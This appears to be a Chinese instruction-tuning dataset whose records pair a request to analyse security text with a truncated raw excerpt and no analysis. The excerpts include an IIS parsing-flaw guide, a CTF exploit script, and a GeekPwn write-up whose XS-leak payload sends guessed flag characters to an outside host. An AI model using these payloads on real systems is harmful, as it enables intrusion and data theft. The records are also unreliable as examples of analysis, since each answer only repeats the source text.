{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright Security-Assessment.com Ltd 2003 White Paper Title: Shattering By Example. Prepared by: Brett Moore Network Intrusion Specialist Security-Assessment.com Date: October 2003 03/10/2003 Page 2 of 19 Copyright Security-Assessment.com Ltd 2003 Abstract Shatter attack is a term used to describe attacks against the Windows GUI environment that allow a user to inject code into another process through the use of windows messages. This document includes technical examples written in C and is not meant to cover the basics of these attacks. We recommend that the following documents have been read to give an understanding of the background of these attacks.  Shatter Attacks - How to break Windows  Chris Paget http://security.tombom.co.uk/shatter.html  Win32 Message Vulnerabilities Redux - Oliver Lavery http://www.idefense.com/idpapers/Shatter_Redux.pdf Summary Previous shatter attacks have been based on the use of messages that accept a pointer as a parameter. This pointer directs execution flow to data that has been supplied by the attacker, therefore allowing the attacker to have a process execute code of their choice. Several windows message will accept a pointer to a callback function as one of the parameters to the SendMessage API. One of these is LVM_SORTITEMS, as shown below; Message LVM_SORTITEMS Description Uses an application-defined comparison function to sort the items of a list view control. Called As SendMessage( (HWND) hWndControl, // handle to control (UINT) LVM_SORTITEMS, // message ID wParam = (WPARAM) (LPARAM) lParamSort; lParam = (LPARAM) (PFNLVCOMPARE) pfnCompare; Parameters lParamSort Application-defined value that is passed to the comparison function. pfnCompare Address of the application-defined comparison function. The comparison function is called during the sort operation each time the order needs to be compared. The attack methods described in this document use messages that at first glance appear safe, but as we will show can be used to wri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npasswd === 用于让用户可以更改自己的密码 ## 补充说明 **passwd命令** 用于设置用户的认证信息包括用户密码密码过期时间等系统管理者则能用它管理系统用户的密码只有管理者可以指定用户名称一般用户只能变更自己的密码 ### 语法 ```shell passwd(选项)(参数) ``` ### 选项 ```shell -d删除密码仅有系统管理者才能使用 -f强制执行 -k设置只有在密码过期失效后方能更新 -l锁住密码 -s列出密码的相关信息仅有系统管理者才能使用 -u解开已上锁的帐号 ``` ### 参数 用户名需要设置密码的用户名 ### 知识扩展 与用户组账户信息相关的文件 存放用户信息 ```shell /etc/passwd /etc/shadow ``` 存放组信息 ```shell /etc/group /etc/gshadow ``` 用户信息文件分析每项用`:`隔开 ```shell 例如jack:X:503:504:::/home/jack/:/bin/bash jack # 用户名 X # 口令密码 503 # 用户id0代表root普通新建用户从500开始 504 # 所在组 : # 描述 /home/jack/ # 用户主目录 /bin/bash # 用户缺省Shell ``` 组信息文件分析 ```shell 例如jack:$!$:???:13801:0:99999:7:*:*: jack # 组名 $!$ # 被加密的口令 13801 # 创建日期与今天相隔的天数 0 # 口令最短位数 99999 # 用户口令 7 # 到7天时提醒 * # 禁用天数 * # 过期天数 ``` ### 实例 如果是普通用户执行passwd只能修改自己的密码如果新建用户后要为新用户创建密码则用passwd用户名注意要以root用户的权限来创建 ```shell [root@localhost ~]# passwd linuxde # 更改或创建linuxde用户的密码 Changing password for user linuxde. New UNIX password: # 请输入新密码 Retype new UNIX password: # 再输入一次 passwd: all authentication tokens updated successfully. # 成功 ``` 普通用户如果想更改自己的密码直接运行passwd即可比如当前操作的用户是linuxde ```shell [linuxde@localhost ~]$ passwd Changing password for user linuxde. # 更改linuxde用户的密码 (current) UNIX password: # 请输入当前密码 New UNIX password: # 请输入新密码 Retype new UNIX password: # 确认新密码 passwd: all authentication tokens updated successfully. # 更改成功 ``` 比如我们让某个用户不能修改密码可以用`-l`选项来锁定 ```shell [root@localhost ~]# passwd -l linuxde # 锁定用户linuxde不能更改密码 Locking password for user linuxde. passwd: Success # 锁定成功 [linuxde@localhost ~]# su linuxde # 通过su切换到linuxde用户 [linuxde@localhost ~]$ passwd # linuxde来更改密码 Changing password for user linuxde. Changing password for linuxde (current) UNIX password: # 输入linuxde的当前密码 passwd: Authentication token manipulation error # 失败不能更改密码 ``` 再来一例 ```shell [root@localhost ~]# passwd -d linuxde # 清除linuxde用户密码 Removing password for user linuxde. passwd: Success # 清除成功 [root@localhost ~]# passwd -S linuxde # 查询linuxde用户密码状态 Empty password. # 空密码也就是没有密码 ``` 注意当我们清除一个用户的密码时登录时就无需密码这一点要加以注意", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndpkg-divert === Debian Linux中创建并管理一个转向列表 ## 补充说明 **dpkg-divert命令** 是Debian Linux中创建并管理一个转向diversion列表其使得安装文件的默认位置失效的工具 ### 语法 ```shell dpkg-divert(选项)(参数) ``` ### 选项 ```shell --add添加一个转移文件 --remove删除一个转移文件 --list列出匹配的转移 --truename对应转移文件真实文件名 --quidet安静模式 ``` ### 参数 文件指定转移文件名 ### 实例 指定软件包wibble安装时写入`/usr/bin/example.foo`而不是`/usr/bin/example` ```shell dpkg-divert --package wibble --divert /usr/bin/example.foo --rename /usr/bin/example ``` 指定软件包wibble安装时删除对`/usr/bin/example`的转移修改 ```shell dpkg-divert --package wibble --rename --remove /usr/bin/example ``` 删除对`/usr/bin/example`的转移修改 ```shell dpkg-divert --rename --remove /usr/bin/example ``` 添加一个软件包安装时写入`/usr/bin/example.foo`而不是`/usr/bin/example`的修改 ```shell dpkg-divert --divert /usr/bin/example.foo --rename /usr/bin/example ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMomigari Overview of the latest Windows OS kernel exploits found in the wild Boris Larin @oct0xor 30-May-19 Anton Ivanov @antonivanovm $whoweare Senior Malware Analyst (Heuristic Detection and Vulnerability Research Team) Boris Larin Head of Advanced Threats Research and Detection Team Anton Ivanov Twitter: @oct0xor Twitter: @antonivanovm 3 What this talk is about Momigari: the Japanese tradition of searching for the most beautiful leaves in autumn Jiaohe city, Jilin province, Northeast China. [Photo/Xinhua] http://en.safea.gov.cn/2017-10/26/content_33734832_2.htm 4 What this talk is about 1) We will give brief introduction about how we find zero-day exploits and challenges that we face 2) We will cover three Elevation of Privilege (EOP) zero-day exploits that we found exploited in the wild  It is becoming more difficult to exploit the Windows OS kernel  Samples encountered ITW provide insights on the current state of things and new techniques  We will cover in detail the implementation of two exploits for Windows 10 RS4 3) We will reveal exploitation framework used to distribute some of these exploits 5 What this talk is about Kaspersky Lab detection technologies 6 We commonly add this detail to our reports: This two technologies are behind all exploits that we found last year Technology #1 - Exploit Prevention 7 Delivery Memory manipulation Exploitation Shellcode execution Exploitation prevented Detection and blocking Payload execution start Technology #2 - The sandbox Artifacts assembled for analysis A file / URL for testing - Execution logs - Memory dumps - System / registry changes - Network connections - Screenshots - Exploit artifacts Verdict and rich data on activity Test VMs The file / URL is sent to several test VMs Artifacts logged Detection of exploits Find Develop Research How-to: Exploits caught in the wild by Kaspersky Lab  May 2018 - CVE-2018-8174 (Windows VBScript Engine Remote Code Execution Vulnerability)  October 2018 - CVE-2018-8453 (Win32k Elev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport hashlib import binascii import unittest from Crypto.Random import random p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798, 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8) # back-ports for python2 from https://stackoverflow.com/questions/16022556/has-python-3-to-bytes-been-back-ported-to-python-2-7 def to_bytes(n, length, byteorder='big'): h = hex(n)[2:].rstrip('L') print 'h', h s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex') return s if byteorder == 'big' else s[::-1] def from_bytes(s, byteorder='big'): return int(s.encode('hex'), 16) def point_add(p1, p2): if (p1 is None): return p2 if (p2 is None): return p1 if (p1[0] == p2[0] and p1[1] != p2[1]): return None if (p1 == p2): lam = (3 * p1[0] * p1[0] * pow(2 * p1[1], p - 2, p)) % p else: lam = ((p2[1] - p1[1]) * pow(p2[0] - p1[0], p - 2, p)) % p x3 = (lam * lam - p1[0] - p2[0]) % p return (x3, (lam * (p1[0] - x3) - p1[1]) % p) def point_mul(p, n): r = None for i in range(256): if ((n >> i) & 1): r = point_add(r, p) p = point_add(p, p) return r def bytes_point(p): return (b'\\x03' if p[1] & 1 else b'\\x02') + to_bytes(p[0], 32, byteorder=\"big\") def sha256(b): return from_bytes(hashlib.sha256(b).digest(), byteorder=\"big\") def on_curve(point): return (pow(point[1], 2, p) - pow(point[0], 3, p)) % p == 7 def jacobi(x): return pow(x, (p - 1) // 2, p) def schnorr_sign(msg, seckey): k = sha256(to_bytes(seckey, 32, byteorder=\"big\") + msg) R = point_mul(G, k) if jacobi(R[1]) != 1: k = n - k e = sha256(to_bytes(R[0], 32, byteorder=\"big\") + bytes_point(point_mul(G, seckey)) + msg) return to_bytes(R[0], 32, byteorder=\"big\") + to_bytes(((k + e * seckey) % n), 32, byteorder=\"big\") def schnorr_verify(msg, pubkey, sig): if (not on_curve(pubkey)): return False r = from_bytes(sig[0:32], byteorder=\"big\") s = from_bytes(sig[32:64], byteorder", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jupyter Notebook 未授权访问漏洞 ## 漏洞描述 Jupyter Notebook此前被称为 IPython notebook是一个交互式笔记本支持运行 40 多种编程语言 如果管理员未为 Jupyter Notebook 配置密码将导致未授权访问漏洞游客可在其中创建一个 console 并执行任意 Python 代码和命令 ## 环境搭建 ``` version: '2' services: web: image: vulhub/jupyter-notebook:5.2.2 command: start-notebook.sh --NotebookApp.token='' ports: - \"8888:8888\" ``` 运行后访问 `http://your-ip:8888` 将看到 Jupyter Notebook 的 Web 管理界面并没有要求填写密码 ## 漏洞复现 选择 new -> terminal 即可创建一个控制台 ![image-20220726145024450](../../.gitbook/assets/image-20220726145024450.png) 直接执行任意命令 ![image-20220726145054024](../../.gitbook/assets/image-20220726145054024.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb中间件常见漏洞总结 ---by lyxhh IIS IIS是Internet Information Services的缩写意为互联网信息服务是由微软公司提供的基于运行Microsoft Windows的互联网基本服务 IIS目前只适用于 目前只适用于Windows系统不适用于其他操作系统 系统不适用于其他操作系统 解析漏洞 解析漏洞 IIS 6.x 基于文件名 该版本 默认会将 *.asp;.jpg 此种格式的文件名当成Asp解析原理是 服务器默认不解析; 号及其后面的内容相当于截断 基于文件夹名 该版本 默认会将 *.asp/目录下的所有文件当成Asp解析 另外IIS6.x除了会将扩展名为.asp的文件解析为asp之外还默认会将扩展名为.asa.cdx.cer解析为asp 从网站属性->主目录->配置 可以看出他们都是调用了asp.dll进行的解析 修复建议 修复建议 由于微软并不认为这是一个漏洞也没有推出IIS 6.0的补丁因此漏洞需要自己修复 1. 限制上传目录执行权限不允许执行脚本 2. 不允许新建目录 3. 上传的文件需经过重命名(时间戳+随机数+.jpg等) IIS 7.x 安装IIS7.5 1.控制面板 -> 程序 -> 打开或关闭windows功能 2.下载php-5.2.6-win32-installer.msi 3.打开msi一直下一步来到选择web server setup的界面在这里选择IIS fastcgi,之后一直下一步 4.打开IIS管理工具 ->Internet 信息服务(IIS)管理器 5.选择编辑ISAPI或者CGI限制 添加安装的php-cgi.exe路径描述随意 6.返回第五步的第一个图片位置点击处理程序映射添加如下 7.phpinfo测试 IIS7.x版本 在Fast-CGI运行模式下,在任意文件例test.jpg后面加上/.php会将test.jpg 解析为php文件 修复建议 修复建议 配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序 结果如下 PUT任意文件写入 任意文件写入 IIS Server 在 Web 服务扩展中开启了 WebDAV之后支持多种请求配合写入权限可造成任意文件写入 修复建议 修复建议 关闭WebDAV 和 写权限 IIS短文件漏洞 短文件漏洞 Windows 以 8.3 格式生成与 MS-DOS 兼容的短文件名以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件在cmd下输入\"dir /x\"即可看到短 文件名的效果 IIS短文件名产生 1.当后缀小于4时短文件名产生需要文件(夹)名前缀字符长度大于等于9位 2.当后缀大于等于4时文件名前缀字符长度即使为1也会产生短文件名 目前IIS支持短文件名猜测的HTTP方法主要包括DEBUGOPTIONSGETPOSTHEADTRACE六种 IIS 8.0之后的版本只能通过OPTIONS和TRACE方法被猜测成功 复现 IIS8.0以下版本需要开启ASP.NET支持IIS大于等于8.0版本,即使没有安装ASP.NET通过OPTIONS和TRACE方法也可以猜解成功 以下通过开启IIS6.0 ASP.NET后进行复现 当访问构造的某个存在的短文件名会返回404 当访问构造的某个不存在的短文件名会返回400 IIS短文件漏洞局限性 1) 如果文件名本身太短也是无法猜解的 2) 此漏洞只能确定前6个字符如果后面的字符太长包含特殊字符很难猜解 3) 如果文件名前6位带空格8.3格式的短文件名会补进和真实文件名不匹配 4) 如果文件夹名前6位字符带点\".\"扫描程序会认为是文件而不是文件夹最终出现误报 5) 不支持中文文件名包括中文文件和中文文件夹一个中文相当于两个英文字符故超过4个中文字会产生短文件名但是IIS不支持中文猜测 短文件利用工具下载 修复建议 修复建议 1从CMD命令关闭NTFS 8.3文件格式的支持 Windows Server 2003 (1代表关闭0代表开启 关闭该功能fsutil behavior set disable8dot3 1 Windows Server 2008 R2 查询是否开启短文件名功能fsutil 8dot3name query 关闭该功能fsutil 8dot3name set 1 不同系统关闭命令稍有区别该功能默认是开启的. 2或从修改注册表关闭NTFS 8.3文件格式的支持 快捷键Win+R打开命令窗口输入regedit打开注册表窗口 找到路径 HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\FileSystem将其中的 NtfsDisable8dot3NameCre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 通信领域常用编码 ## 电话拨号编码 1-9 分别使用 1-9 个脉冲0 则表示使用 10 个脉冲 ## Morse 编码 参见 [摩尔斯编码 -维基百科](https://zh.wikipedia.org/wiki/%E6%91%A9%E5%B0%94%E6%96%AF%E7%94%B5%E7%A0%81)对应表如下 ### 特点 - 只有 `.` 和 `-` - 最多 6 位 - 也可以使用 `01` 串表示 ### 工具 - [摩尔斯编码在线转换](http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx) ### 题目 - JarvisOJ - Basec - -.-字符串 ## 敲击码 敲击码Tap code是一种以非常简单的方式对文本信息进行编码的方法因该编码对信息通过使用一系列的点击声音来编码而命名敲击码是基于 5 5 方格波利比奥斯方阵来实现的不同点是是用 K 字母被整合到 C 中 |Tap Code|1|2|3|4|5| |--|--|--|--|--|--| |1|A|B|C/K|D|E| |2|F|G|H|I|J| |3|L|M|N|O|P| |4|Q|R|S|T|U| |5|V|W|X|Y|Z| ## 曼彻斯特编码 - [曼彻斯特编码 - 维基百科](https://zh.wikipedia.org/wiki/%E6%9B%BC%E5%BD%BB%E6%96%AF%E7%89%B9%E7%BC%96%E7%A0%81) ## 格雷编码 - [格雷码 - 维基百科](https://zh.wikipedia.org/wiki/%E6%A0%BC%E9%9B%B7%E7%A0%81)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReflective Injection Detection  RID.py Or How I slapped together some python c-types in a week to do what defensive vendors aren't incorporating into main-line products Or Bringing the Sexy Back - A defensive tool that doesn't fail quite as hard as it could Pre-talk notes  I don't own any of the artwork. It's all from google-images without copyright notices.  I think fault lies on both sides of the fence.  My statements here don't reflect my past, present, or future employer's point of view. Some thinks were inserted merely for humor. Who Am I? This page intentionally left blank Who Am I? On a more serious note: You can check out my CV here on linkedin: pub/andrew-king/23/432/679 Just a note, defense is first offense is last Why would I do a talk that's going to make people angry? Reflective Injection?  Load DLL from memory  VirtualAlloc or Ex  No heap(might fragment) Defense  Programmers are lazy  Not just defensive programmers  So there's probably very little 'request specific and check' going on  Memory address allocations tend to be pretty predictable  Possible optimization for scanning Offense  So what if they start looking for our PE mapping code?  Just do the expansion on disk with some utility and now all that relocation code isn't needed.  Vendors would rather search for reflect inject stager code I think...  See some AV detects my obfuscation tutorial as malicious even though it prints hello... Fail Why does it still work?  Can we detect it at runtime?  Only if we monitor VirtualAllocEx which seems really doubtful since all memory allocations eventually wind up there.  Why it's not implemented in my opinion.  Can we scan memory for it?  Sure, that's easy. Defense side of things Finding reflect injected DLLs  What does a DLL structurally have that raw data doesn't?  PE header  COFF headers  Section tables  Permissions  Predictable layout So first build a white-list  Get all processes  Get modules for all processes  Build an exclusion map for yourself Virtua", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackdooring the Front Door About me  Software Engineer by trade  Hacker by passion  Lock picker for fun  The best puzzles are not meant to be solved  All opinions are my own, and may not reflect those of my past, present, or future employers  Twitter: @jmaxxz Internet of things August smart lock August's marketing team \"Unlike physical keys which can be duplicated and distributed without your knowledge\" Source: august.com (August 17th, 2015) \"Safer than  codes that can be copied.\" Source: august.com (September 14th, 2015) Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activity feed  View Guest List  Change lock settings  Keys can not be duplicated or distributed  Track who enters and exits your home Mapping out the API WiFi | HTTPS BLE MitM proxy Certificate pinning crap... Solution: iOS Kill Switch 2 (https://github.com/nabla-c0d3/ssl-kill-switch2) Disabling SSL/TLS system wide at Defcon? Better solution No Jailbreak Certificate Pinned!!! Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activity feed  View Guest List  Change lock settings  Keys can not be duplicated or distributed  Track who enters and exits your home After mapping out api Postman collection created (see github repo) Not anonymized Creepy Let's fix this MiTM can modify traffic Fix Don't forward log data to August, and tell app logs were received What else can we do? Guest to admin? Guests can not use Auto-Unlock Guests can not control lock settings Replace \"user\" with \"superuser\" Guests can change lock settings! Security claims  Perfectly secure  Guest access can be revoked at any time  Guest permission can be limited to a schedule  Guest can not  Use auto unlock  Invite or remove guests or owners  View activi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom pwn import * import math #r=remote(\"localhost\", 8001) r=remote(\"54.202.194.91\", 65535) def setGates(gates, final=False): s=\"\" s+=struct.pack(\">H\", len(gates)) for gate in gates: # X, Y, Z, Hadamard, rotate by 90, Measure if gate[0]!=\"R\": type, wire, arg = gate else: type, wire, arg, ang = gate ch=0x80*wire if type=='M': ch|=arg # Bomb number else: ch|=0x70 ch+=0x8*arg # Controlled? ch|={\"X\": 1, \"Y\": 2, \"Z\": 3, \"H\": 4, \"9\": 5, \"R\": 6}[type] s+=chr(ch) if type==\"R\": s+=struct.pack(\"<d\", ang) r.send(s) if not final: return ord(r.recv(1)) if 0: xxx=[ (\"H\", 0, 0), (\"H\", 1, 0), (\"R\", 0, 1, 0.01), (\"X\", 0, 1), (\"R\", 0, 1, -0.01), (\"H\", 0, 1), (\"9\", 0, 0) ] gates=[ (\"H\", 0, 0), (\"X\", 1, 0), ] for i in range(0, 100): gates+=[ (\"R\", 0, 0, 0.01), (\"X\", 0, 0), (\"R\", 0, 0, -0.01), (\"H\", 0, 0), (\"R\", 0, 0, math.atan2(i**0.5, (1+i/100.)**0.5)), (\"9\", 0, 0), (\"H\", 0, 0), ] def test(idx): num=500 gates=[ (\"H\", 0, 0), (\"R\", 0, 0, math.pi/num), (\"H\", 0, 0), (\"M\", 0, idx), ]*num return setGates(gates) bombs=[] for i in range(14*8): print \"Testing\",i,\"/\",14*8 bombs.append(test(i)) # 0 - bomb, 1 - clear setGates([], True) print bombs s=\"\" for i in range(14): b=0 for j in range(8): if bombs[i*8+j]==0: b|=1<<(7-j) s+=chr(b) r.send(s) print r.recv()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 软件安全漏洞挖掘 技术探讨 文伟平 博士 北京大学软件与微电子学院 小组主页www.pku-exploit.com 联 系 Q Q513357938 漏洞挖掘技术难点 漏洞挖掘本身的难度 函数模型Windows 7之前系统 逻辑模型 安全开发平台 云计算 虚拟化 系统安全对抗 Windows 78系统安全防护机制 IE 的Use after Free GSSafeSEHDEP和ASLR ROPHeap SprayJIT Spray SharedUserData 小组主页www.pku-exploit.com 联 系 Q Q513357938 漏洞挖掘和利用的技术难点 Windows8内存保护 传统内存保护 堆内存保护 GS SEHProtect ASLR DEP Randomized LFH PageGuard VTGuard FreeEntryOffset Removed Anti-ROP 其他内存保护 NullPage Protection VirtualAlloc Randomization GS SEH Protect ASLR DEP ForceASLR HeASLR Anti-ROP Windows 8 小组主页www.pku-exploit.com 联 系 Q Q513357938 软件漏洞挖掘相关技术 基于Crash信息的漏洞挖掘技术 参考安全补丁的漏洞挖掘技术 系统内核函数无序调用挖掘技术 基于协议握手的测试漏洞挖掘技术 基于浏览器对象UAF漏洞挖掘技术 基于FLASH对象UAF漏洞挖掘技术 小组主页www.pku-exploit.com 联 系 Q Q513357938   系统转储文件 基于Crash信息的漏洞挖掘技术  完全内存转 储  核心内存转 储  小内存转储 小组主页www.pku-exploit.com 联 系 Q Q513357938   KTRAP_FRAME陷阱帧 基于Crash信息的漏洞挖掘技术 小组主页www.pku-exploit.com 联 系 Q Q513357938   定位函数 基于Crash信息的漏洞挖掘技术  最后执行的函数为win32k!SfnINSTRING接 下来应该利用IDA工具分析该函数的反汇编代码判 断是否存在逻辑缺陷判断是否可以进一步利用 小组主页www.pku-exploit.com 联 系 Q Q513357938   静态分析相关代码确定原因 基于Crash信息的漏洞挖掘技术  win32k!SfnINSTRIN G函数执行过程中对用户 态空间传递过来的wParam lParam没有做任何判断 复制[esi+8]处的数据时 也没有限制[esi+8]是内核 地址还是用户态地址如 果esi[esi+8]是一个不可 访问的内存地址那么将 会导致无法访问内存而蓝 屏崩溃 MS11-054发现过程 小组主页www.pku-exploit.com 联 系 Q Q513357938   由补丁引发的思考  通常安全补丁对漏洞代码的修 改及代码运行流程基本不会有太大 的变化而这种漏洞修补方式可能 存在如下安全隐患:  1) 软件厂商修补漏洞缺乏全局 考虑, 通常只注重对漏洞点的修补  2) 往往只考虑当前漏洞的上下 文环境, 而未必考虑到整个系统或者 第三方代码对全局变量或逻辑条件 带来的影响 参考安全补丁的漏洞挖掘技术 小组主页www.pku-exploit.com 联 系 Q Q513357938   参考安全补丁比对的漏洞挖掘思路 软件安全补丁面临安全隐患 分析补丁找出补丁所 修补的代码位置以及实 际出现问题的代码位置 路径查找条件执行符 号执行判断代码内部是 否存在新的安全漏洞 1路径查找会找到所有可 能的执行路径 2条件执行会尝试执行这 些路径以判断当前路径是 否是实际可执行的 3符号执行通过代码变量 的逻辑抽象与控制流相结合 得到条件约束最后通过约 束求解的方法来判断代码 内部是否存在安全漏洞 参考安全补丁的漏洞挖掘技术 小组主页www.pku-exploit.com 联 系 Q Q513357938 以某漏洞为例验证参考安 全补丁漏洞挖掘技术的有效性 专门为针对这个补丁而增设的标 志位VdmSafe漏洞点B及补丁点 P已经定位  通过分析可知该补丁可能存 在新的安全隐患补丁后攻击代码 实现攻击流程如右图所示   参考安全补丁技术应用 参考安全补丁的漏洞挖掘技术 小组主页www.pku-exploit.com 联 系 Q Q513357938  北 京 大 学 软 件 安 全 研 究 小 组 发 现 的 MS11-010进一步证明了参考安全补丁技术 的有效性  该漏洞是在分析MS10-011安全补丁的基 础上采用本方法发现的一个安全漏洞  MS10-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGeekPwn CTF WP AuthorNu1L Team GeekPwn CTF WP WEB noXSS 2020 rtmpdump cosplay! umsg Re easyydre Androidcmd babyre Pwn BabyPwn PlayTheNew EasyShell ChildShell WEB noXSS 2020 .... Cross Origin Opener Policy <!DOCTYPE html> <html lang=\"en\"> <head> <script> function cb(win,c) { if(win.frames.length == 0) { location.href = ('<http://geekpwn.d7cb7b72.n0p.co/'+c>); } win.close() } function test(c) { url = \"<http://noxss2020.cal1.cn:3000/?keyword=flag>{e6bd066f-d918- 496c-b3d2-ccd972d7a5a2\"+c; console.log(url); win = window.open(url); rtmpdump 0daycrontab cosplay! setTimeout(cb.bind(null,win,c), 5000); } var charset = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F', '-', '}'] for(var i=0; i<charset.length;i++) { test(charset[i]); } </script> </head> <body> </body> </html> var Bucket = '933kpwn-1253882285'; var Region = 'ap-shanghai'; var cos = new COS({ getAuthorization: function (options, callback) { var url = '/GetTempKey?path=/upload'; var xhr = new XMLHttpRequest(); xhr.open('GET', url, true); xhr.onload = function (e) { try { var data = JSON.parse(e.target.responseText); var credentials = data.Credentials; } catch (e) { } if (!data || !credentials) return console.error('credentials invalid'); callback({ TmpSecretId: credentials.TmpSecretId, TmpSecretKey: credentials.TmpSecretKey, XCosSecurityToken: credentials.Token, ExpiredTime: data.ExpiredTime, }); }; listObjectVersions Bucket f1L9@/flag.txt VersionId getObject umsg js xhr.send(); } }); document.getElementById('file-selector').onchange = function () { var file = this.files[0]; if (!file) return; cos.putObject({ Bucket: Bucket, Region: Region, Key: '/upload/' + file.name, Body: file, }, function (err, data) { console.log(err, data); }); }; cos.listObjectVersions({Bucket: Bucket, Region: Region}, function (err, data) { console.log(err || data); }); cos.getObject({Bucket: Bucket, Region: Region, Key: 'f1L9@/flag.txt', VersionId: 'MTg0NDUxNDk2MzgxNjA2ODMyNTU'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n惡意程式與防毒軟體之爭 伙計 NISRA 2016 NISRA 教學目的  提供同學們資安相關入門知識並開啟同學們資安研究的興趣 NISRA 要感謝的人太多 那就謝天吧 NISRA 大綱  前言  我的電腦中毒了  什麼是惡意程式  惡意程式的三種躲避偵測原理  防毒軟體的三道防禦機制  資安相關名詞與工具介紹  資安防護的迷思  補充JS木馬簡單分析心得 NISRA 前言 NISRA 前言 NISRA 每一個人心中或多或少都有中毒恐懼症 NISRA NISRA 不只祖克伯FBI 局長也在筆電視訊鏡頭貼 膠帶防偷窺 [科技新報] NISRA 敵暗我明草木皆兵 NISRA 我的電腦中毒了  電腦速度變慢  系統不穩定常當機  出現不明視窗廣告  首頁被綁架  防毒軟體跳出警告或被消失  出現要求付贖金畫面  用起來很正常 NISRA 什麼是惡意程式  影響使用者的電腦  影響使用者的資料或財產  影響使用者的隱私 安全 NISRA 病毒特洛伊木馬蠕蟲 會偷偷傳送使用者資料 會感染或破壞使用者檔案 會運用漏洞或網路主動散播自己 NISRA 統稱為惡意程式  病毒特洛伊木馬蠕蟲  病毒產生器  病毒下載器  瀏覽器綁架  廣告程式  鍵盤側錄器  間諜程式等等 NISRA 惡意程式常見的三種躲避偵測方法  加殼  加花  去除特徵 NISRA 加殼  保護檔案不被破解  加密殼壓縮殼  外殼程式包裹著被保護的程式  防毒軟體無法辨識內容物  常見加殼軟體UPXASPACK 被保護的檔案 NISRA 加花  程式碼中塞入無意義的指令  影響防毒軟體的偵測與工程師的 分析 NISRA 加花  程式碼中塞入無意義的指令  影響防毒軟體的偵測與工程師的 分析 題目我的夢想 第一行請從第四行開始閱讀 第二行請到第412行開始閱讀 第三行請從第五行開始閱讀 第四行請到1+1+sin 90 行開始閱讀 第五行我夢想每天睡到自然 NISRA 去除特徵  修改被防毒廠商定義為特徵的程 式碼  針對特定防毒軟體來達成免殺  免殺能力強  惡意程式 NISRA 防毒軟體的三道防禦機制 已知病毒偵測 未知病毒偵測 行為偵測 NISRA 已知病毒偵測病毒碼  防毒軟體辨識病毒的基本方法  防毒公司會依每個病毒的特徵給予獨一無二 的病毒特徵碼  不同防毒軟體無法通用 NISRA 已知病毒偵測病毒碼 NISRA 未知病毒偵測基因偵測啟發式偵測 基因偵測  現有已知病毒中尋找共同的特 徵作為基因偵測病毒碼 啟發式掃描  啟發式(Heuristic)是指探索和發現的 行為過程  依靠經驗並在失敗中不斷學習的過 程  不倚靠病毒碼來檢測  啟發式引擎用本身的規則庫以靜態 分析樣本代碼的方式來偵測惡意程 式 NISRA 基因偵測  假設 3A 20 B2 9C 55 FF 08 13 7B 58 1D -> Trojan  假設 3A 20 B2 9C 55 FF 08 ->GEN  BC 15 0C 3A 20 B2 9C 55 FF 08 13 7B 58 1D  CA 03 14 AA 3A 20 B2 9C 55 FF 08 43 2D FC NISRA 啟發式掃描  修改註冊表  對外連線  更改系統檔案  安裝驅動程式  生成新執行檔並執行  刪除自己 總分________ NISRA 行為偵測HIPS主動式入侵防禦系統  hostbased intrusion prevension system  現今防毒軟體最終且最重要的防禦技術  監控系統程序阻止異常行為 NISRA NISRA 防毒軟體的三道防禦機制 已知病毒偵測 未知病毒偵測 行為偵測 白名單 NISRA 雲端白名單 NISRA 防毒軟體的三道防禦機制 已知病毒偵測 未知病毒偵測 行為偵測 白名單 靜 態 分 析 動 態 分 析 NISRA 資安相關名詞與工具介紹  防火牆  社交工程與網路釣魚  假防毒軟體  Zero Day 漏洞  蜜罐  沙盤與虛擬機  AV-TEST  VirusTotal  Payload security NISRA 防火牆  隔離網路過濾網路中傳送的封包 老闆不是有防 火牆嗎 NISRA 社交工程與網路釣魚  獲取使用者信任的欺騙行為  假冒客服電話  